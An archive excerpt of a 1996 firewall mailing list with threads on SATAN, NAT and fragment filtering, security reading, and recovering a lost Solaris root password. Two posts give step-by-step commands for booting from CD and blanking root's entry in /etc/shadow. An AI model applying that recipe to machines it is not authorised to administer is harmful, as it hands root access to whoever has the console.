nothing is adversely affected. On Thu, 18 Jul 96 9:53:00 -0400 Wojno, Jim wrote: > My suggestion is that after booting the CD into single user mode, and > mounting the root partition, use ufsrestore to restore *both* the > /etc/passwd, and the /etc/shadow files from a known good backup tape. Mike --- From firewalls-owner Fri Jul 19 05:03:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16541 for firewalls-outgoing; Fri, 19 Jul 1996 05:01:38 -0700 (PDT) Received: from fire1.sprintlink.net (fire1.sprintlink.net [206.229.244.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16534 for ; Fri, 19 Jul 1996 05:01:29 -0700 (PDT) Received: from fire2.int.sprintlink.net ([206.229.244.28]) by fire1.sprintlink.net Received: from athens.int.sprintlink.net ([208.0.2.203]) by fire2.int.sprintlink.net Received: (from rquinn@localhost) by athens.int.sprintlink.net (8.7.5/8.7.3) id HAA04508 for firewalls@greatcircle.com; Fri, 19 Jul 1996 07:58:22 -0400 (EDT) From: Rob Quinn Message-Id: <199607191158.HAA04508@athens.int.sprintlink.net> Subject: Re: bind address already in use To: firewalls@greatcircle.com Date: Fri, 19 Jul 1996 07:58:22 -0400 (EDT) Reply-To: rquinn@sprint.net X-Alternate-Address: rjq@phys.ksu.edu Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Re: bind address already in use > When you strongly kill a process, it happens the process don't close a > file descriptor correctly. This is all answered/explained in the comp.unix.programmer FAQ. Try rtfm.mit.edu. -- | It must be true, Rob Quinn | | I saw it (703)904-2125 | | on tv. rquinn@sprint.net | | Sprint Corporate Security | From firewalls-owner Fri Jul 19 06:06:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19278 for firewalls-outgoing; Fri, 19 Jul 1996 05:48:39 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19271 for ; Fri, 19 Jul 1996 05:48:29 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id IAA13371 for firewalls@greatcircle.com; Fri, 19 Jul 1996 08:50:53 -0500 From: Adam Shostack Message-Id: <199607191350.IAA13371@homeport.org> Subject: Code review guidelines? To: firewalls@greatcircle.com (Firewalls mailing list) Date: Fri, 19 Jul 1996 08:50:53 -0500 (EST) X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have code review guidelines available? The only ones I can find on the web are a process description for nuclear power plants, which while interesting, have different requirements than firewalls. (Reliability above all else, somewhat trusted users, lots of user interaction) (A firewall, incidentally, should not be reliable above all else, it should be secure first. This means that it can fail in odd ways, as long as it remembers to turn off all the network connections first. The firewall should be secure first, reliable second. Of course, reliable is a big part of secure, but its not the only part.) The guidelines are located at: http://hissa.ncsl.nist.gov/publications/nistir4909/ Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Jul 19 06:18:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20380 for firewalls-outgoing; Fri, 19 Jul 1996 06:16:56 -0700 (PDT) Received: from ACML.COM ([206.218.249.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20371 for ; Fri, 19 Jul 1996 06:16:46 -0700 (PDT) Received: from smtpngw.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) Received: by smtpngw.acml.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA5530; Fri, 19 Jul 96 09:13:54 -0400 Message-Id: <9607191313.AA5530@smtpngw.acml.com> Received: from ACML with "Lotus Notes Mail Gateway for SMTP" id To: Firewalls From: Rey.LeClerc/New.York/ACMC Date: 18 Jul 96 21:23:27 Subject: Re: SATAN Information Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SATAN (Security Analysis Tool for Auditing Networks) is a software tool for assessing Internet host and network security. SATAN tests hosts systems to determine which Internet services are sent and whether those services are configured or contain vulnerabilities that an intruder could exploit. SATAN provides limited information on how to correct vulnerabilities as well as a modest tutorial on host system security. SATAN can test individual hosts or entire networks of hosts systems. SATAN is an analysis and reporting tool only; it does not break into systems or exploit new and/or rare vulnerabilities. All the vulnerabilities it finds are well known and have either bulletins and/or patches from an incident response team or a vendor. However, as with most tools of this type, not just system administrators but intruders will undoubtedly use SATAN to find vulnerabilities in certain systems and then they will exploit these systems. Thus, while the tool aids a conscientious secure-aware administrator, it does increase the risk to the unwary administrator. You can find this in the following web site: http://www.fish.com/~zen/satan/satan-me.html Tools similar to SATAN have been available for years . One that comes to Raxco Security Toolkit. Actually, this has been renamed as Axent ESM (Enterprise Security Manager). I've used it in the past and it is quite good. From firewalls-owner Fri Jul 19 07:12:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA23314 for firewalls-outgoing; Fri, 19 Jul 1996 06:49:23 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA23302 for ; Fri, 19 Jul 1996 06:49:17 -0700 (PDT) Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id GAA29128 for ; Fri, 19 Jul 1996 06:46:14 -0700 (PDT) Message-Id: <2.2.32.19960719134202.009cbc8c@ins.com> X-Sender: martin_d@ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 19 Jul 1996 09:42:02 -0400 To: firewalls@greatcircle.com From: Darwin Martinez Subject: UDP Broadcast Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All: A new HP platform was brought up on the net yesterday, and the firewall shows that it is sending out a UPD broadcast on the LAN, service 135 (Location Service). What exactly is this, is it required, and if not, how can I detect the process that is using it (ps -ef?). Thanks. ------------------------------------------------------------------------ Darwin L. Martinez Email: darwin_martinez@ins.com Network Systems Engineer Site #: 404-843-5954 International Network Services Pager: 800-INS-1-INS Atlanta Office "To run with the big dogs, you gotta get off the porch!" ------------------------------------------------------------------------ From firewalls-owner Fri Jul 19 07:34:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA25380 for firewalls-outgoing; Fri, 19 Jul 1996 07:24:28 -0700 (PDT) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA25364; Fri, 19 Jul 1996 07:24:21 -0700 (PDT) From: pp001261@Interramp.Com Received: from www by smtp2.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) Date: Fri, 19 Jul 96 10:16:50 PDT Subject: Re: SATAN Information To: Firewalls X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You need to check out Reese Web, Inc., their product and security audit service is far more comprehensive than SATAN and it is commercially supported. http://www.TampaWeb.com/ReeseWeb/ >SATAN (Security Analysis Tool for Auditing Networks) is a software tool for >assessing Internet host and network security. SATAN tests hosts systems to >determine which Internet services are sent and whether those services are >configured or contain vulnerabilities that an intruder could exploit. SATAN >provides limited information on how to correct vulnerabilities as well as a >modest tutorial on host system security. SATAN can test individual hosts or >entire networks of hosts systems. SATAN is an analysis and reporting tool >only; it does not break into systems or exploit new and/or rare >vulnerabilities. > >All the vulnerabilities it finds are well known and have either bulletins >and/or patches from an incident response team or a vendor. However, as with >most tools of this type, not just system administrators but intruders will >undoubtedly use SATAN to find vulnerabilities in certain systems and then they >will exploit these systems. Thus, while the tool aids a conscientious >secure-aware administrator, it does increase the risk to the unwary >administrator. > >You can find this in the following web site: >http://www.fish.com/~zen/satan/satan-me.html > >Tools similar to SATAN have been available for years . One that comes to Raxco >Security Toolkit. Actually, this has been renamed as Axent ESM (Enterprise >Security Manager). I've used it in the past and it is quite good. From firewalls-owner Fri Jul 19 09:15:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00532 for firewalls-outgoing; Fri, 19 Jul 1996 08:39:34 -0700 (PDT) Received: from citel.upc.es (citel.upc.es [147.83.36.47]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA00513 for ; Fri, 19 Jul 1996 08:39:08 -0700 (PDT) Received: from jolibus (jolibus.upc.es [147.83.36.68]) by citel.upc.es (8.7.3/8.6.11) with SMTP id RAA23368 for ; Fri, 19 Jul 1996 17:35:51 +0100 (WET DST) Message-ID: <31EFAB56.2E7DA7DF@citel.upc.es> Date: Fri, 19 Jul 1996 17:35:50 +0200 From: Francesc Guasch Organization: UPC X-Mailer: Mozilla 2.02 (X11; I; Linux 2.0.0 i586) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: SATAN Information References: <9607191313.AA5530@smtpngw.acml.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sorry, which one was the trojan version of satan ? I apologize for the off-topic , I didn't start the thread 8) -- ^-^_-----\ mailto:frankie@citel.upc.es o o ) http://www.etsetb.upc.es/~frankie Y (_ (___(ssss phone: (343) 401 6809 From firewalls-owner Fri Jul 19 09:34:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA03261 for firewalls-outgoing; Fri, 19 Jul 1996 09:24:49 -0700 (PDT) Received: from mulligan.com (grab.coslabs.com [199.233.92.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA03254 for ; Fri, 19 Jul 1996 09:24:42 -0700 (PDT) Received: from future.mulligan.com by mulligan.com (SMI-8.6/SMI-SVR4) Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) Message-Id: <199607191621.KAA17626@future.mulligan.com> To: "Wojno, Jim" cc: firewalls@greatcircle.com (Firewalls) Subject: Re: [HELP] I lost root password! Reply-to: geoff@usa.net In-reply-to: Your message of "Thu, 18 Jul 1996 09:53:00 EDT." X-Mailer: Mew version 1.05 on Emacs 19.31.1 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 19 Jul 1996 10:21:09 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk While you're right that editing /etc/passwd won't allow you to change the root password on Solaris 2.x, you CAN just edit /etc/shadow and you don't have to worry about pwconv or restoring older versions of /etc/passwd and /etc/shadow Here is the cookbook method to remove the root password: 1. Insert your Solaris 2.x installation CD. 2a. If you have a keyboard and monitor on the system: Type L1 A (hold down the L1/STOP key and press a) or POWER OFF - WAIT - POWER ON your machine 2b. If you don't: Send a BREAK over your console port or POWER OFF - WAIT - POWER ON your machine 3. At the boot prompt type boot cdrom -s 4. After the system comes up, at the # command prompt type: mount /dev/dsk/c0t3d0s0 /mnt (you may have to change the device if your root partition is on a different drive) 4a. It's possible that you might have to fsck the partition before you can mount it - fsck /dev/rdsk/c0t3d0s0 5. Once the drive is mounted type: ed /mnt/etc/shadow /^root:/c root::::::: . w q 6. After you have edited the shadow password file reboot the machine: uadmin 2 1 7. After the system reboots log in as root 8. AND RESET YOUR ROOT PASSWORD geoff From firewalls-owner Fri Jul 19 10:22:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA06969 for firewalls-outgoing; Fri, 19 Jul 1996 10:07:29 -0700 (PDT) Received: from sabre.net (sabre.net [199.100.49.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA06952 for ; Fri, 19 Jul 1996 10:07:22 -0700 (PDT) Received: (from uucp@localhost) by sabre.net (8.6.11/8.6.11) id MAA29559 for ; Fri, 19 Jul 1996 12:04:22 -0500 Received: from ns1.amrcorp.com(144.9.33.153) by sabre.net via smap (V1.3) Received: from amrcorp.com (ngw.amrcorp.com [144.9.33.151]) by amrcorp.com (8.7.1/8.7.1) with SMTP id MAA10719 for ; Fri, 19 Jul 1996 12:03:11 -0500 (CDT) Received: from USGW2-Message_Server by amrcorp.com Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 18 Jul 1996 12:57:56 -0600 From: Jasjit K Singh To: Firewalls@GreatCircle.COM, pera@medcom.se Subject: RE: [HELP] I lost root password! -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stop-A boot cdrom -sw ( This will put you in single user writtable mode without asking for password ) Mount the / disk ( /dev/dsk/c0t3d0s0 - default ) on /mnt vi the .etc.shadow file and remove the password field. Run passwd and change the password for root. Halt the machine again and this time boot from the disk. Good Luck!! From firewalls-owner Fri Jul 19 11:00:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09466 for firewalls-outgoing; Fri, 19 Jul 1996 10:43:18 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA09445 for ; Fri, 19 Jul 1996 10:43:11 -0700 (PDT) Message-Id: <199607191743.KAA09445@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: IP Masquerading and vulnerabilities] To: shaver@neon.ingenia.ca (Mike Shaver) Date: Sat, 20 Jul 1996 03:39:26 +1000 (EST) Cc: peter@baileynm.com, cosmo@ebs.net, firewalls@GreatCircle.COM In-Reply-To: <199607140617.CAA20357@neon.ingenia.com> from "Mike Shaver" at Jul 14, 96 02:17:52 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Mike Shaver, sie said: > > Thus spake Peter da Silva: > > > > > Linux 2.0 has an option to re-assemble all fragmented > > > packets going thru it before applying the filter which stops it. > > > > Or just block packets that are too short to hold all the options. If you try > > and reassemble all the fragments that opens you up to a denial of service > > attack, and there really isn't any legitimate need to have packets that > > short. > > The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the > transparent proxy and NAT code more correct; otherwise, you can get > things like PORT commands (which matter to the NAT stuff, obviously) > split between 2 fragments. Just quickly, I sometimes wonder about the wisdom of those adding these featurisms to Linux. At least I think I remember being taught in networking classes how it is bad for a routing box to try reassemble entire packets rather than just endpoints. [I wonder if proxies/relays fit into this category too...] The problem being delt with is where NAT meets proxy (effectively). Unless the NAT uses a proxy of sorts to deal with translating addresses inside any layer above transport, it is not going to be a bug-free NAT. Well, this depends on how you define NAT... > My recommendation is that the transparent proxy stuff is better than > the NAT stuff (Darren? =) ), but it's not quite as plug-and-play. I would NOT use NAT if I wanted to make sure FTP/Real Audio, etc, worked... Darren From firewalls-owner Fri Jul 19 11:03:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10128 for firewalls-outgoing; Fri, 19 Jul 1996 10:53:19 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA10121 for ; Fri, 19 Jul 1996 10:53:14 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA00579 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Fri, 19 Jul 96 10:48:04 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607191748.AA02341@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, worrall@icn-inc.net Subject: Re: Network Security Magazines? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've found InfoSecurity to be interesting. It's written somewhat more to security than network technology, but overall it's not bad for a free magazine - read lots of ads and you have to fill out one of those surveys to get a subscription. I got my subscription through our plant security dept., but you can try emai